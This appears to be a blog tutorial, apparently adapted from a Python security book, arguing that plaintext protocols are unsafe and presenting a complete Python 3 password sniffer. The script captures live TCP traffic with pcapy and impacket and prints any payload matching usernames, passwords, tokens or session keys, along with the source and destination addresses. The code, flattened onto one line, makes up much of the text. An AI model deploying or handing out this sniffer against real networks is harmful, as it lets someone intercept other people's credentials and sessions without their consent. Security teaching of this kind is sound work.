The internet, as wel as local area networks, consist of a huge number of services. You use HTTP(s) for surfing web
pages, SMTP to send emails, POP3 or IMAP to read emails, ICQ, IRC, Skype or jabber to chat and so on.
A Network Simple Sniffer tool in python3
Most people
should by now have heard that HTTP without the
S is insecure and should not be used to send one's
bank account data thourgh the net. However most protocols for daily use are
plaintext protocols, like ICQ or SMTP and
IMAP/POP3. Facebook, the biggest social network of the world has recently adopted
HTTPS as default. One can activate
SSL encryption for most commonly used protocols or
install a SSL proxy in front of a service if it doesn't support
SSL by itself, but only a few people care about data security
and encryption.
Unencrypted network traffic is the
low hanging fruit every attacker is searching for. Why should an attacker try
to crack passwords if he can easily read them? danger of unencrypted protocols with Password Sniffer
Password Sniffer
The danger of unencrypted protocols can most
effectively be demonstrated with the help of a password sniffer. Even fellow
men, that “do not have anything to hide”, recognize that the interception of
their username and password is an act that endangers their privacy and they
would like to avoid it if possible. Therefore we will now write a program that
will try to hunt for username and password combination by matching predefined
strings to the packets payload and dump them on the display. To do so, we will
adapt the source cod.
#!/usr/bin/python3 import sys import re import getopt import pcapy from impacket.ImpactDecoder import EthDecoder, IPDecoder, TCPDecoder #interface to sniff on dev = "wlan0" #pcap filter filter = "tcp" #Decoder for all layers eth_dec = EthDecoder() ip_dec = IPDecoder() tcp_dec = TCPDecoder() #pattern that match username and passwords pattern = re.compile(r"""(?P<found>(USER|USERNAME|PASS|PASSWORD|LOGIN|BENUTZER|PASSWORD|AUTH|ACCESS|ACCESS_?KEY|SESSION|SESSION_?KEY|TOKEN)[=:\s].+)\B""", re.MULTILINE|re.IGNORECASE) #This function will be called for every packet, decode it and try to find a username or password in it. def handle_packet(hdr, data): eth_pkt = eth_dec.decode(data) ip_pkt = ip_dec.decode(eth_pkt.get_data_as_string()) tcp_pkt = tcp_dec.decode(ip_pkt.get_data_as_string()) payload = ip_pkt.get_data_as_string() match = re.search(pattern, payload) if not tcp_pkt.get_SYN() and not tcp_pkt.get_RST() and \ not tcp_pkt.get_FIN() and match and \ match.groupdict()['found'] != None: print("%s:%d -> %s:%d" % (ip_pkt.get_ip_src(),tcp_pkt.get_th_sport(),ip_pkt.get_ip_dst(),tcp_pkt.get_th_dport())) print("\t%s\n" % (match.groupdict()['found'])) def usage(): print(sys.argv[0] + " -i <dev> -f <pcap_filter>") sys.exit(1) # Parsing parameter try: cmd_opts = "f:i:" opts, args = getopt.getopt(sys.argv[1:], cmd_opts) except getopt.GetoptError: usage() for opt in opts: if opt[0] == "-f": filter = opt[1] elif opt[0] == "-i": dev = opt[1] else: usage() # Start sniffing pcap = pcapy.open_live(dev, 1500, 0, 100) pcap.setfilter(filter) print("Sniffing passwords on " + str(dev)) pcap.loop(10, handle_packet)
This time we filter TCP traffic, because the author is not aware of any UDP based
protocols that have a login or authentication mechanism.
For a decoder we additionally define IPDecoder and TCPDecoder to extract
the IP- and TCP header by applying the function handle_packet. Therefore we
provide the packet from the previous layer to the decoder, though IPDecoder
gets the ETH packet, the TCPDecoder an IP packet and so forth. The payload of
the IP packet can be accessed as an ASCII-string with the help of the method
get_data_as_string(), which sometimes leads to ugly undisplayable characters,
especially when dumping binary data. Therefore we first match the payload
against a regular expression (Sect. 3.9) to make sure it contains a string
like User, Pass, Password or Login. In contrast to regular password sniffers,
our sniffer does not just search in predefined protocols but in all TCP
traffic and tries to detect other authentication mechanisms like session keys
and cookies beside username and password combinations.
I hope you liked this post, then you should not forget to share this post at
all.
Thank you so much :-)